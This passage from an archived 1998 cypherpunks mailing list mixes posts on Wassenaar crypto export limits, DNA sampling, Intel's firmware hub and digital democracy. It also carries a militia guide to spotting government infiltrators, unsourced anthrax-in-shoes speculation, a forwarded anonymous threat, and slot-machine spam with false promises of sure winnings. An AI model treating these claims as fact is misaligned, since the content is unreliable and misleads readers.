>    would could express ourselves politically - and have our expressions
>    count - isn't it at least conceivable that the U.S. Congress might be
>    talking about something that matters today, and for the last year?
>    
>    Digital democracy is no longer a pipedream, not in the year of the
>    online dumping of the Starr report and the impeachment proceedings.
>    It's no longer difficult to imagine every American having a computer
>    in the next few years, or having easy access to one in schools,
>    libraries and public buildings. People could vote online now as easily
>    as they vote by ballot or booth - more easily really. Each citizen
>    could be assigned a digital voting number and use it to vote from home
>    or the school or library down the road, where computers already exist
>    or could easily be set up. Fraud would be easier to spot and guard
>    against, thanks to advances in both encryption and programming. And
>    this wouldn't even raise fresh privacy issues, as voters have to
>    register now.
>    
>    This week, the country is confronted with the bizarre spectacle of a
>    runaway political entity - Republicans in the House of Representatives
>    - deciding, correctly or not, that no interest is more important than
>    impeaching President Clinton - not public sentiment, military action,
>    education, health care, the economy or any other civic or social
>    agenda. Even if they're right, lots of people are uneasy about this
>    willful disregard of public will. Most Americans don't want this to be
>    happening, and have said so for months. The politicians have said that
>    it doesn't really matter, the next election is two years away. By
>    then, nobody will remember this strange time. That's a good argument
>    for some form of Digital Democracy.
>    
>    Digital voting made possible by the Internet would make a spectacle
>    like the impeachment proceedings impossible. Everything shouldn't
>    necessarily be subject to popular vote, but the impeachment of the
>    President should be, and the Net and the Web could make it possible
>    even now.
>    
>    Watching music lovers challenge the primacy of the music industry
>    through digital technology like MP3's and the Rio raises the question
>    of whether we really need a middleman institution like Congress to
>    decide issues like this for us. After the year long Lewinsky/Clinton
>    media barrage and the dumping of reams of material, pornographic and
>    otherwise on the Internet, we know as much about the charges against
>    the President as they do. We are able and equipped to make up our own
>    minds and express our own wishes. And perhaps even see our wishes
>    carried out.
>    
>    Do we need to be bound to completely by their agenda, when we can now
>    set our own?
>    
>    Unlike Colonial Americans, we aren't disconnected and remote. We can
>    make our feelings known instantly. We have the technology to gather in
>    communities and clusters to debate and consider as much or more
>    information as members of Congress.
>    
>    Many politicians and journalists have feared, even loathed, the
>    Internet, since its inception. Increasingly, it becomes clear why. It
>    really does threaten them. It really does provide the means to take
>    power away from them - and their co-produced spectacles like
>    impeachment proceedings and presidential nominating processes - and
>    distribute it more broadly. This week marks the perfect time to begin
>    consider the possibilities of Digital Democracy. To broaden the notion
>    of empowering individuals begin by the designers of the Internet,
>    advanced by hackers, geeks, nerds, developers and designers and being
>    played out on sites like this one today. From the moment the Internet
>    began to grow, power and information began to leach away from
>    entrenched institutions like government, the press and academe and
>    towards hundreds of thousands, then millions of individual citizens.
>    The impeachment proceedings are a powerful argument for the idea that
>    it's time to take that idea farther.
>    
>    Digital technology doesn't mean that democratic decisions would have
>    to be rushed or impulsive. They could be as deliberative as we wished.
>    Digital voting could be spread over time, perhaps requiring several
>    votes. A broad range of issues and decisions - appointments, foreign
>    policy decisions, criminal matters - would be inappropriate for online
>    voting.
>    
>    But the Net is becoming a medium already well set-up for civic
>    discussions. The Internet could host hundreds, even thousands of
>    public online forums for debate and discussion - via message boards,
>    chat rooms and websites that could be designed for towns, counties,
>    states or regions. Politicians, agencies and advocates could
>    disseminate information and arguments via national websites, mailing
>    lists and e-mail.
>    
>    These forums would have to consider new kinds of rules for debate and
>    discussion, an online issue long in need of attention. Posters would
>    have to identify themselves and take responsibility for their words.
>    Discussion would center on issues, not personalities. Presidents and
>    legislators could bring information and decisions directly to the
>    American public. If the Starr report was worthy of being dumped on
>    line, why not the House Judiciary report on impeachment? Voters could
>    read it online, debate it, decide to pass it along for further action
>    or stop the process right there.
>    
>    If digital democracy were in place, this issue would have been
>    resolved nearly a year ago. Tens of millions of dollars would have
>    been better spent. Many more important issues would have considered,
>    accepted and rejected. Clinton would either be doing his job or long
>    gone. Instead of feeling cheated and ignored, the public would feel
>    enfranchised and involved. Democracy wouldn't be a remote circus
>    practiced far away by alien cultures, but something as close as a desk
>    or living room.
>    
>    We are no longer a country of merchants and mostly illiterate farmers.
>    Paine and Jefferson, the fathers of media, couldn't quite have
>    imagined the Internet, but there seems little doubt that they have
>    loved its communicative and democratic possibilities. Those of us with
>    access to computers and modems have access to all of the information
>    and opinions in the world, thus the means to consider issues and
>    express ourselves. In fact, there are thousands of people who've been
>    online for years and who are experienced at creating digital
>    communities, monitoring conversations and developing the software and
>    hardware to run them efficiently and accurately.
>    
>    No system involving Digital Democracy could work or even be seriously
>    considered until and unless all Americans were guaranteed access to
>    computers. A few years ago, online users were a tiny, techno-elite.
>    That's no longer true. Computers are increasingly ubiquitous, at
>    schools, businesses, and at home. Personal computers are already being
>    mass-marketed that cost well below $1,000, and public agencies like
>    schools, libraries and municipal office buildings are increasingly
>    wired. They could offer online voting to non-computer users in much
>    the way they offer voting booths and make them available. Many more
>    Americans own computers than voting booths.
> 


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Sat, 19 Dec 1998 04:21:08 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: international free crypto campaign
In-Reply-To: <v04020a44b2a002ece47e@[139.167.130.248]>
Message-ID: <Pine.BSF.3.96.981218135022.14406D-100000@greeves.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain



:Hello,
:We are in the midst of developing logos 4 the global campaign
:proposed as followup 2 the Wassenaar decision.
:The logos are here:
:
:http://www.quintessenz.at/freecrypto.html
:
:We would appreciate ur evaluation, suggestions highly welcome.

I can see using the smaller ones ("echelons" @ ~8.5k), but the other
[animated gif's] are simply too big.  The download time on them is
excessive (although I do like their design).  Remember *most* ppl are
still accessing the www at 28k +/-.

Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Sat, 19 Dec 1998 03:53:13 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: [CTRL] Fwd: DNA Sample with Every Arrest
In-Reply-To: <199812180318.TAA03849@netcom13.netcom.com>
Message-ID: <367AAB1A.B56D7484@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain




> Safir said a suspect's DNA sample would be destroyed if he were 
> acquitted or cleared.

Indeed, the innocent have very much to fear.  Had Safir intended the above to
be true, there would be no need to take the samples during the initial arrest
of every person, only in those cases where it was necessary.

And what will be the penalty for not destroying the DNA samples when the
victim is acquitted or cleared?  (Indeed, victim no longer applies to the
person hurt by the alleged criminal, now the alleged criminal is also a
victim.)

So what's next, randomly arresting people driving through an intersection and
then releasing them after their DNA is in the master catalog?  Requiring DNA
samples to get drivers licenses along and finger prints too?  Having DNA
samples in your driver's license and having random check points to make sure
it matches your license?  Using DNA as SSN's?  Taking DNA samples with
vaccination?  Shades of Gataca!


-- 
----------------------------  Kaos Keraunos Kybernetos  -------------------
 + ^ +        Sunder          "The   real aim  of current policy is to /|\
  \|/    sunder@sunder.net    ensure the continued effectiveness of   /\|/\
<--*--> ALLOW FREE EXPORT OF  US information warfare assets against   \/|\/
  /|\   STRONG CRYPTOGRAPHY!  individuals,businesses and governments   \|/
 + v +  PROTEST WASSENAAR!!!  in Europe and elsewhere"  -- Ross Anderson
------------------------------ http://www.sunder.net ----------------------

RESTRICTED DATA - This material contains RESTRICTED DATA as defined in
the Atomic Energy Act of 1954. Unauthorized disclosure subject to 
administrative and criminal sanctions.  NOFORN ORCON WNINTEL SIOP-ESI CNWDI




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Sat, 19 Dec 1998 07:14:38 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Comrade Klinton at it again
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B38B@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Motyka wrote:
> Don't you mean "Iraqui" Embassy?
> 
> Or is this thing spreading? I hope not.

Why would there be an Iraqi embassy in Iraq?! You nitwit!

Iranian Embassy in Baghdad.

Somebody said:
> As I recall, the name "Desert Fox" was a nickname held by a Nazi 
> general. Fitting, that.

I thought maybe the Fox News channel bought sponsorship ;)

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tony@secapl.com
Date: Sat, 19 Dec 1998 04:14:46 +0800
To: cypherpunks@cyberpass.net
Subject: Re: [CTRL] Fwd: DNA Sample with Every Arrest
In-Reply-To: <367AAB1A.B56D7484@brainlink.com>
Message-ID: <Pine.A32.3.95.981218143816.24356A-100000@T2.secapl.com>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 18 Dec 1998, Sunder wrote:

> So what's next, randomly arresting people driving through an intersection and
> then releasing them after their DNA is in the master catalog?  Requiring DNA
> samples to get drivers licenses along and finger prints too?  Having DNA
> samples in your driver's license and having random check points to make sure
> it matches your license?  Using DNA as SSN's?  Taking DNA samples with
> vaccination?  Shades of Gataca!

  Not sure where this is from but:

   "The government already has DNA samples from all US citizens, why else
    do you think they kept the copper penny in circulation?" 

  I doubt copper can really collect DNA, and even if so, how they'd
correlate it with individuals, but with public health vaccinations and
(HMO at least) medical exams, the USG has had the opportunity to
collect DNA samples of a very large percentage of the population already.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CyberPsychotic <mlists@gizmo.kyrnet.kg>
Date: Fri, 18 Dec 1998 19:37:11 +0800
To: cypherpunks@toad.com
Subject: RPK Encryptonite engine
Message-ID: <Pine.LNX.4.05.9812181556450.10479-100000@gizmo.kyrnet.kg>
MIME-Version: 1.0
Content-Type: text/plain




Hello people,

Just wondering if anyone could pull a word on RPK crypto. They say they
built their engine based on  Diffie-Hellman Key Exchange principles (which
shoulds safe enough), but they claim their software doesn't fail under US
crypto restriction law, which makes me suspicious.


--
fygrave@tigerteam.net		http://www.kalug.lug.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pallas Anonymous Remailer <athena@cyberpass.net>
Date: Sat, 19 Dec 1998 10:50:57 +0800
To: cypherpunks@cyberpass.net
Subject: How to Spot a Government Infiltrator
Message-ID: <c3118f5d71c691af6d2c0a19397e1b4c@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



How to Spot a Government Infiltrator 

                              by Mike Johnson

Those who have been studying the stories released to the media these days about the arrests of
various different people within the militia movement will doubtlessly have noted that government
infiltrators are usually involved. This should make people nervous. 

And rightly so. Our normal view of government is that the only people who should have to worry
about what the government is up to are people who are breaking the law. As the vast majority of
constitutional militia units are composed of people who are of good character and don't go around
breaking the law to begin with, they might feel that they should have little to worry about from the
government. 

Unfortunately that does not seem to be the case. The government appears to be going all out to
discredit the constitutional militia movement in this country. This effort on the part of the government
does include the use of government agents to infiltrate militia units and cause as many problems, hate
and discontent as they possibly can. In many instances, these government agents may not be readily
apparent as to who and what they are. Some of these people may have had extensive experience in
working undercover operations and may not make some of the more stupid mistakes. 

There are a variety of different roles that such government operatives may play. The first is that they
may simply act as a mole. They will do everything anybody else in the unit does, and do nothing at all
to call undue attention to themselves. However, they will relay everything that goes on within the unit
to their handlers. About the only indication a unit may have that they have been infiltrated by a mole
may be that they can't seem to be able to keep anything a secret. This type of role is the most difficult
for a unit to detect and deal with. Which is also possibly why most of the spy novels that get written
deal with various different ways to smoke out moles. While I wouldn't suggest that anybody try a
technique for which the only source of documentation is a work of fiction, it is an indication of just
how obnoxious this type of agent could be to deal with. 

Another role that a government agent might play may be that of a dissipator. A dissipator is one who
tries to redirect the course and energy of a unit in ways which will cause it to accomplish nothing of
any importance. They may also act so as to break a unit up by emphasizing differences,
disagreements and personality clashes between unit members. Given that the people who are
attracted to the constitutionalist militia movement usually tend to be strong willed and opinionated
people to begin with, such an agent may find that his task is somewhat easier than it might be if he
were working with other groups. Unit members should simply be encouraged not to take things
personally, be aware that there will be honest differences of opinion between the members of the unit,
and to be wary of somebody who does try to take everything personally, or set up cliques within the
unit. 

The final role which will be discussed is that of the agent provocateur. Such an agent infiltrates a unit
and tries to get the members of the unit to actually commit crimes, or make it look like they are
actually planning to commit crimes. One should also bear in mind that a government agent is not going
to be confined to operating within any one of the roles that have been discussed, and may likely mix
and match as they feel best. However, the role that has received the highest profile in government
operations these days is that of the agent provocateur. That is largely because the results of an
operation conducted by an agent provocateur or two make for good propaganda when the media
gets hold of it. The resultant publicity given to the arrests and the charges gets used to brand
everybody in the entire movement as a criminal. The fact that the entire thing was set up by someone
in the employ of the government isn't going to be mentioned at all by the mainstream media. 

For those who haven't caught on by now, your antenna should start to quiver in the presence of any
one, or especially a combination of the following behaviors/patterns demonstrated by a unit member: 

     (1) Wants to make bombs.
     (2) Wants to get everybody else to make bombs.
     (3) Wants people to buy/store large quantities of substances which could be used for
     explosives manufacture.
     (4) Fanatic about obtaining fully automatic weapons, without benefit of Class III
     license.
     (5) No obvious means of support, especially if they have lots of money to throw
     around.
     (6) Auto license tag changed on an irregular basis.
     (7) Encourages people to plan/do stupid things (raid armories, blow up office buildings,
     etc.)
     (8) Some groups can get auto tags run. They should be especially suspicious of
     anybody whose auto tag turns up a complete blank when run. (9) In our case, the guy
     was absolutely paranoid about his car being out of either his sight or his "wife's" sight for
     even a trivial amount of time.
     (10) Person claims to have a military background that they do not have. One individual
     claimed to be former Special Forces, but was found to be ignorant of some of the things
     that he should have known when quizzed by people who were former Special Forces.
     Depending on the level of trust that the members of your group have with each other, it
     might be a good idea to request to see the DD-214s of anybody claiming to have a
     military background.
     (11) One of your members has taken effective action to expose or block activities of
     the police or government preventing the expansion of or preservation of government
     power to control people and/or invade the privacy of the people.
     (12) One of your members (a) has an FFL; or (b) is involved in selling at gun shows; or
     (c) Is involved in promoting gun shows. 

Arguably the best way to deal with people who meet criteria 1-10 is simply to invite them to leave
the unit. As Starr and McCranie found out, trying to turn them in will do no good at all, so the next
best bet is to try to get them to leave. Failing that, disband unit, start again from scratch with people
you can trust after sufficient elapsed time. Given the way things are going right now, those who have
not joined up with public units may want to consider forming small closed units with just a small group
of people that they have known for a long time and that they trust. 

For persons in 11, and 12: Do your best to be sure the goons cannot find a pretext as that is what
they often work from. 

(*) Bill Albert of the Michigan Militia contributed to the list of items to look for and the discussion
which follows it. 



#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 19 Dec 1998 09:19:58 +0800
To: cypherpunks@cyberpass.net
Subject: [Steve Coya] Harmful changes to Wassenaar Arrangement
Message-ID: <v04020a5bb2a0a6b3bc4f@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


To: cryptography@c2.net
Subject: [Steve Coya] Harmful changes to Wassenaar Arrangement
Reply-To: perry@piermont.com
From: "Perry E. Metzger" <perry@piermont.com>
Date: 18 Dec 1998 18:51:52 -0500
Lines: 49
Sender: owner-cryptography@c2.net


FYI, from the IETF Secretariat.


Message-Id: <199812182315.SAA10709@ietf.org>
To: IETF-Announce: ;
Subject: Harmful changes to Wassenaar Arrangement
Date: Fri, 18 Dec 1998 18:15:36 -0500
From: Steve Coya <scoya@ns.cnri.reston.va.us>


The IAB and the IESG deplore the recent changes to the Wassenaar
Arrangement (http://www.wassenaar.org) that further limit the
availability of encryption software by including it in the Wassenaar
agreement's list of export controlled software (section 5.A.2.a.1
of the list of dual-use goods, WA LIST 98 (1)).  As discussed in
RFC 1984, strong cryptography is essential to the security of the
Internet; restrictions on its use or availability will leave us
with a weak, vulnerable network, endanger the privacy of users and
businesses, and slow the growth of electronic commerce.

The new restrictions will have a particularly deleterious effect
on smaller countries, where there may not be enough of a local
market or local expertise to support the development of indigenous
cryptographic products.  But everyone is adversely affected by
this; the Internet is used world-wide, and even sites with access
to strong cryptographic products must be able to talk to those who
do not.  This in turn endangers their own security.

We are happy that the key size limit has been raised in some cases
from 40 bits to 64; however, this is still too small to provide
real security.  We estimate that after a modest capital investment,
a company or criminal organization could crack a 64-bit cipher in less
than a day for about $2500 per solution.  This cost will only drop
in coming years.  A report released about three years ago suggested
that 90-bit keys are the minimum for long-term security.

   Brian Carpenter (IAB Chair)
   Fred Baker (IESG and IETF Chair)

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@remailer.ch>
Date: Sat, 19 Dec 1998 07:33:20 +0800
To: cypherpunks@cyberpass.net
Subject: REPORT ON CYBER-TERRORISM
Message-ID: <19981218230834.905.qmail@hades.rpini.com>
MIME-Version: 1.0
Content-Type: text/plain



A new report on national security, titled "CyberCrime, CyberTerrorism and
CyberWarfare," calls for a complete overhaul of U.S. national security
agencies and policies in order to avoid crippling sabotage of the nation's
and corporate America's information infrastructure.  The report, which is
the product of the Center for Strategic and International Studies' Global
Organized Crime project headed up by former FBI and CIA director William
Webster, chronicles the results of a recent joint chief of staff exercise
code-named "Eligible Receiver."  The exercise involved a group of security
experts, known as a "red team," that used software widely available from
cracker Web sites to demonstrate the capability to penetrate and disable
major portions of the U.S. electric power grid and deny computer systems to
the entire Pacific military command and control operation.  The report
recommends the establishment of private sector-organized groups that would
evaluate and endorse information security standards in various industries,
coupled with increased government support for such efforts and the
development of a national security policy for the Information Revolution.
"The private sector cannot sit back and wait for government to lead," says
Sen. Charles Robb (D-Va.), a member of the Senate Select Committee on
Intelligence.  (InternetWeek 16 Dec 98)

#!/usr/local/bin/perl -0777-- -export-a-crypto-system-sig -RC4-3-lines-PERL
@k=unpack('C*',pack('H*',shift));for(@t=@s=0..255){$y=($k[$_%@k]+$s[$x=$_
]+$y)%256;&S}$x=$y=0;for(unpack('C*',<>)){$x++;$y=($s[$x%=256]+$y)%256;
&S;print pack(C,$_^=$s[($s[$x]+$s[$y])%256])}sub S{@s[$x,$y]=@s[$y,$x]}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Sat, 19 Dec 1998 14:12:34 +0800
To: cypherpunks@toad.com
Subject: Forwarded mail....
Message-ID: <Pine.BSF.3.96.981218233803.14992A-100000@greeves.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
::Date: Sat, 19 Dec 1998 05:21:34 +0100
::From: Anonymous <nobody@replay.com>
::To: sysadmin@mfn.org

::You should be expecting a visit from the boys in the suits very soon.
::Have fun.  I hope your cellmate is a big guy they call "The Bull."

::Traitorous scum.
---------- Message Ends ----------

What I *really* love about these "patriots" is how they are not _afraid_
to stand by their words!  Awwww, c'mon!  You're on the "Side Of
Right(tm)", so why hide?  You afraid I'm gonna piss on your white picket
fence?

Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark 13 <mark@zor.hut.fi>
Date: Sat, 19 Dec 1998 07:25:56 +0800
To: cypherpunks@toad.com
Subject: Intel's Security Plans Worry PC Builders
Message-ID: <Pine.LNX.3.96.981219002137.3771A-100000@zor.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain



I wonder what government sponsored back doors they plan to include...

http://www.techweb.com/wire/story/TWB19981214S0008

                Intel's Security Plans Worry PC Builders

                (12/14/98, 3:49 p.m. ET)
                By Rick Boyd-Merritt and Mark Carroll, EE Times 

                Intel will add new security and software functions to future
                chip sets in a move that will boost the profile of its
                upcoming Katmai processors as key silicon for multimedia
                and e-commerce. But the plan is raising concerns among
                software, semiconductor and systems companies that fear
                the processor giant could wind up encroaching on their
                markets, extending its own reach deeper into the PC
                architecture.

                Intel's plans center around a so-called firmware hub,
                essentially a flash memory with key BIOS functions,
                which will be part of its Camino, Carmel, and Whitney chip
                sets. Those products will accompany next year's Katmai
                processors and are expected to be used in the Merced line,
                too. 

                "This is an example of Intel taking in one more piece of the
                PC architecture," said a senior R&D manager with a major
                PC company who asked not to be named. 

                Intel would not comment on its unannounced products.
                However, the key features of the chip are beginning to
                come to light based on reports from multiple sources. The
                firmware hub is "basically a flash chip with locks on its
                read and write capabilities that can be opened using a
                cryptographic protocol," said another source briefed by
                Intel. 

                Hardware security functions include a cryptographic
                engine to authenticate digital certificates Intel or a third
                party could load in. The chip could hold multiple
                certificates, each with permission to grant specific
                features, such as to permit an operating system or an
                MPEG player to run. They would also ensure a software
                program licensed to one user was not copied and run on
                another machine, a common practice. In addition, the
                certificates will act like unique serial numbers, identifying a
                given machine in any Internet or corporate network
                transaction, sources said. 

                The hub may also include a random-number generator to
                create public keys for encryption and help enable
                encrypted transmissions between PCs. That would provide
                security for e-commerce and software downloads,
                possibly including software modules for host-based
                modems, MPEG players, or audio codecs that are
                housed in the firmware hub and run on the CPU. 

                Another feature sources have mentioned is physical
                security, linking sensors to the hub so it may report
                problems to a central network administrator if the case is
                tampered with or peripherals are removed. 

                Even though the firmware -- and the chip sets it is part of
                -- are not due for production until at least mid-1999,
                samples have been available in Taiwan for some time. 

                "We have had samples of the firmware hub for a while,"
                said a project manager at First International Computer, in
                Taiwan. "We really haven't done too much with it yet. It is
                still not quite clear when it will be used and what its 
                full functions will be." 

                The hub chip is designed to incorporate new features into
                the PC upon start-up, the manager said, not to replace the
                standard BIOS, the key software that controls system I/O
                  peripherals software. 

                "After a PC is turned on, the firmware hub will be
                accessed and then the regular BIOS," said a BIOS
                engineer with another Taiwanese company. "The hub will
                affect the standard BIOS architecture, but it certainly
                won't replace it. That's not its purpose." 

                Yet the prospect of a possible Intel incursion into BIOS is
                giving some industry observers the willies. Adding to their
                concern is the fact that Intel has not provided technical
                details about its implementation yet. One analyst said the
                hub will act as a BIOS registry, a place from which
                software emulation and upgrades can be controlled. 

                Sources close to Intel suggested the Santa Clara, Calif.,
                company would be leery of entering a new PC-related
                market while under the shadow of a Federal Trade
                Commission investigation. The company's motive is simply
                to bring new features to the PC, enhancing sales for
                corporate and consumer users, these sources said. 

                Still, "If Intel controls what and how stuff gets put in the
                BIOS, that's really significant," said one analyst.
                "That's a wonderful control choke point."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Sat, 19 Dec 1998 14:12:35 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Preemptive, proactivism
Message-ID: <367B3EAA.2F870154@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain



Preemptive ;-)

Sources within the US government and military counterterrorism offices
have confirmed that the timing of "Desert Fox" was carefully planned and
coordinated. Counterterrorism planners are anticipating terrorists will
be incited into action as a result of US military action so close to the
Muslim holy period of Ramadan. Terrorists with middle eastern ties may
decide that the religious holiday observance of Christmas would be a
good time to retaliate against western targets. "There's a proactive
element involved in conducting military operations near Ramadan", one
source said, "We won't be opening presents this Christmas, we'll be on
our posts alert and watching."

Another source said that the House impeachment vote was a serendipitous
occurrence. "It actually helps with our activities. The bad guys think
we're distracted, that there's no leadership. Actually, we've never been
more focused, we're hyped. Our operations have been in high gear since
the Africa (embassy) bombings, Desert Fox is an outgrowth of that. We
know what these guys are going to do before they do."

The recent cacophony of events in Washington D.C. may soon take on an
aura of japanese surrealism. The secret service is weighing the
necessity of having White House visitors and press conference attendees
remove their shoes. The ability to disperse anthrax toxin from the
hollowed-out heels of shoes is something that cannot be ignored. Sources
said that such an incident, occurring in areas of pedestrian traffic,
would disperse a toxin with tragic effectiveness. "It doesn't take much
imagination to see the consequences of spilling a powder on the rug in a
White House press briefing, lots of shuffling around in a closed
environment, lots of inhaled toxin."

What's scary is that someone could disperse a toxin unwittingly. "Do you
know where your shoes are 24 hours a day?" an agent said. "This is
something we have to think about, but short of an actual scare, I don't
think we'll be asking you to take off your shoes. Not just yet."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 19 Dec 1998 15:34:24 +0800
To: users@EINSTEIN.ssz.com (SSZ User Mail List)
Subject: NEW TRAVEL INFO -- Worldwide Caution (fwd)
Message-ID: <199812190722.BAA23900@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From owner-travel-advisories@nic.stolaf.edu Fri Dec 18 23:27:02 1998
Date: Thu, 17 Dec 1998 11:44:02 -0500
From: owner-travel-advisories <owner-travel-advisories@stolaf.edu>
Subject: NEW TRAVEL INFO -- Worldwide Caution
Sender: "U.S. Department of State" <76702.1202@compuserve.com>
To: travel-advisories@stolaf.edu
Message-ID: <199812171147_MC2-63F5-4090@compuserve.com>
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Precedence: bulk
X-List-Info: LN=travel-advisories WHOM=76702.1202@compuserve.com

STATE DEPARTMENT TRAVEL INFORMATION - Worldwide Caution - Iraq
============================================================
Worldwide Caution - Iraq - Public Announcement
 December 16, 1998

In light of the military operations against Iraq and the potential 
for retaliatory action, the Department of State urges U.S. citizens 
traveling or residing abroad to review their security practices, to 
remain alert to the changing situation, and to exercise much greater 
caution than usual.  While the U.S. Government has no specific 
information about threats to American citizens at this time, the 
potential for retaliatory acts against U.S. citizens exists.

American citizens traveling or residing abroad are reminded to 
maintain a high level of vigilance and to take appropriate measures 
to protect their personal security.  In addition, American citizens 
should maintain a low profile, vary routes and times for all travel, 
and treat mail from unfamiliar sources with suspicion.

American citizens traveling or residing abroad should contact the 
nearest U.S. embassy or consulate by telephone or fax for up-to-date 
information on security conditions.  Current information on 
operations of U.S. embassies and consulates is also available on the 
Internet at http://travel.state.gov.  In addition, U.S. citizens 
planning to travel abroad should consult the Department of State 
Public Announcements, Travel Warnings, Consular Information Sheets, 
and regional brochures.

This Public Announcement supplements the November 12, 1998 
Worldwide Caution Public Announcement and the November 3 Public 
Announcement on Iraq and expires on March 15, 1999.

----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- ----- -----
The "travel-advisories@stolaf.edu" mailing list is the official Internet and
BITNET distribution point for the U.S. State Department Travel Warnings and
Consular Information Sheets.  To unsubscribe, send a message containing the
word "unsubscribe" to:	travel-advisories-request@stolaf.edu

Archives of past "travel-advisories" postings are available at the URL:
"http://www.stolaf.edu/network/travel-advisories.html" or via Gopher:
gopher.stolaf.edu, Internet Resources/US-State-Department-Travel-Advisories




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KKappa21@aol.com
Date: Sun, 20 Dec 1998 01:44:18 +0800
Subject: SECRETS REVEALED!!
Message-ID: <c3392db9.367bd39d@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



LUCKY SLOTS!!
HOW TO BEAT THE
CASINO BANDITS



Dear Thrill Seeker,

Everybody loves to play the slots. But just about everybody LOSES when they
play the slots. This book has news for you. SLOT MACHINES CAN BE BEATEN!! You
can now "disarm" the Bandits!

Here's a book that gives you all the necessary tips, strategies and techniques
you need to boost your winnings by 100%-AND MORE. Here under one cover you are
given the hard rules for overcoming the bandits, rules that you'll be able to
employ now- IMMEDIATELY!

You will learn all you need to know about slots, so much so that you will win
and win and win!

Pick machines that yield the biggest wins make adjustments to conserve your
bankroll quit before your hot streak fades learn how casino slots are set how
odds are calculated locations of "loose" & "tight" machines locating casinos
where winning is easier.

IMAGINEI Thousands of slot machines at your disposal just waiting to be
plucked. Machines with jackpots of $50,000, $100,000, yes, even a MILLION
dollars, sitting there ready to unload their booty.

One thing is for sure. You must have some Ape of edge to win at the slot This
great book will give you that edge. So buy it, take it with you to the casinos
and . . .


THE NEXT PULL OF THE HANDLE COULD MAKE YOU A  MILLIONAIRE!!!

FEATURING 
 1. SLOTS SLANG
 2. TYPES OF SLOTS
 3. HOW TO PLAY SLOTS
 4. VIGORISH
 5. SLOTS AND PERCENTAGES
 6. MONEY MANAGEMENT
